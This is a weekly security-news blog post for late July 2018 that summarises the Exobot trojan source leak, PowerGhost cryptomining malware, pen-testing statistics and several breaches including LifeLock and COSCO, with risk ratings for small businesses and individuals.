Inside the Ink

The Week in Breach: 07/23/18 – 07/27/18

This week there were a few troubling breaches that stood out, especially the identity theft company LifeLock. When a company deals with sensitive information like the data LifeLock stores, customer trust is paramount…. so, when a breach occurs it really makes one reevaluate the effectiveness of the organization. A U.S. bank was also breached, with customer accounts drained at hundreds of ATMs across the country: a clear sign of a highly organized and effective attack. Bad actors are becoming smarter and getting better at attacking organizations, and the barrier to entry into this career of crime is getting lower and easier.

This Trojan is GallopingThe increasing popularity of ‘malware as a service,’ which is pre-packaged malware, developed by authors with technical skill and leased to less advanced cybercriminals, has made it easier for cybercriminals to launch advanced attacks on victims across the globe. A top-shelf malware as a service known asExobothas had its code leaked after the author of the malware sold the banking trojan’s source code to interested parties. Once the source code is sold to enough people, eventually someone posts it publicly or it leaks in other ways. Authors of these ‘service’ malware rarely sell off the source code, that is unless they are finished with the project and moving on to other things. This is concerning in multiple ways, first being that a new more powerful malware may be in the works by the same author, second being that the sophisticated Android banking trojan is now becoming more available to bad actors. Researchers fear that the availability of the source code on underground hacking forums and its inevitable spread across the web will trigger a surge of malicious Android applications. History lends to this conclusion, as the leak of Android banking trojan ‘BankBot’ on the web lowered the barrier of entry into the world of malware and resulted in an explosion of the use of the trojan.https://www.bleepingcomputer.com/news/security/source-code-for-exobot-android-banking-trojan-leaked-online/

The Best Test to FailPenetration testers are useful for assessing the strength and weaknesses in the cybersecurity of an organization, and according to new research these testers are mostly successful. Penetration testers can gain control over the network in question 67% of the time. The study in question was conducted by Rapid7 and examined organizations across industries and sizes, providing a supple sample size for finding two main points of vulnerabilities. The main vulnerabilities proved to be software and credentials. Software has increasingly been used to infiltrate networked resources, and credentials have always been a route of entry for bad actors. Only 16% of the organizations examined did not have a vulnerability, which is less than last year’s study, where 32% were vulnerability-free.https://www.darkreading.com/threat-intelligence/new-report-shows-pen-testers-usually-win/d/d-id/1332368

I Ain’t Afraid of No PowerGhostThere is a new cryptocurrency mining malware out in the wild, and instead of using an individual’s devices, this malware has been targeting business PCs and servers. The cryptojacker is fileless, utilizing PowerShell and EternalBlue to spread through a business like a disease. PowerGhost is what researchers have begun calling the malware, and it can start on a single system and then spread to other organizations. As of the writing of This Week in Breach, South America is mainly affected by the cryptojacker, but PowerGhost also has a presence in North America and Europe.https://www.zdnet.com/article/this-new-cryptomining-malware-targets-business-pcs-and-servers/

Exploit:Unprotected server/supply chain vulnerability.Risk to Small Business: Extreme:A breach of this magnitude and depth would more than likely end a small business due to the extremely sensitive information that was leaked. Most companies would not choose to do business with an organization that leaked their trade secrets.Individual Risk: Extreme:Passport photos and driver’s license scans of some employees were leaked, which puts them at extreme risk for identity theft.Level One Robotics:Ontario-based business that provides industrial automation services for automotive suppliers.Date Occurred/Discovered:July 10, 2018Date Disclosed: July 23, 2018Data Compromised:

Exploit:Lack of website authentication and security.Risk to Small Business: High:Email addresses were exposed, which allows bad actors to target customers. The exploit also allowed a hacker to unsubscribe from all communication with the company, which could be devastating to small businesses.Individual Risk: Low:Due diligence with opening phishy emails and being suspect of unexpected emails will go a long way to combat this breach.LifeLock:Identity theft protection company.Date Occurred/Discovered:July 2018Date Disclosed: July 25, 2018Data Compromised:

Exploit:Phishing.Risk to Small Business: High:The cybercriminals got away with a great deal of money in this hack. Most small businesses would not be able to stay afloat after a hit like the one detailed here.Individual Risk: Extreme:The money taken was from customer accounts.The National Bank of Blacksburg:A banking organization located in Virginia.Date Occurred/Discovered:May 2016 and January 2017Date Disclosed: Not disclosed, but discovered when a lawsuit was filed June 28, 2018Data Compromised:

Exploit:Ransomware.Risk to Small Business: High:The Company’s email is down, forcing employees to use Yahoo mail to communicate with customers as well as internally.Individual Risk: Low:Customers of the shipping company are not affected due to the continuing operation of thecompany, but it may be more difficult to coordinate with them.COSCO:COSCO is an acronym for China Ocean Shipping Company and is a Chinese state-owned shipping services company. It is the 4thlargest shipping company in the world.Date Occurred/Discovered:July 24, 2018Date Disclosed: July 25, 2018Data Compromised:A ransomware attack has taken down their American network. The organization is keeping the breach under wraps, for now, so most details are not disclosed.Customers Impacted: All the organization’s customers are affected by this attack. The difficulty in contacting the company could disrupt its customers’ business.https://www.bleepingcomputer.com/news/security/ransomware-infection-cripples-shipping-giant-coscos-american-network/

Exploit:Ransomware.Risk to Small Business: High:Ransomware would be highly disruptive to any sized business.Individual Risk: Moderate:There is no indication that any customer’s data was exfiltrated.Blue Spring Family Care:Family healthcare provider.Date Occurred/Discovered:May 12, 2018Date Disclosed: July 26, 2018Data Compromised:Ransomware attack encrypted the organization’s data. The extent of the attack is not clearly defined.Customers Impacted: 44,979https://www.databreaches.net/mo-blue-springs-family-care-notifies-44979-patients-after-ransomware-attack/

A note to your customers:Supply Pain.Supply chain attacks are extremely prevalent and costly, and most organizations are not prepared for them. A recent study found that less than 40% of organizations in the US, UK and Singapore have properly vetted their suppliers in the last year. Two-thirds of organizations have suffered a supply chain breach within the same time-frame, and almost three quarters (71%) don’t require the same level of security from their suppliers as they do internally. With the global average cost of a supply chain breach at $1.1 million, do you want to take those odds?https://www.darkreading.com/attacks-breaches/two-thirds-of-organizations-hit-in-supply-chain-attacks-/d/d-id/1332352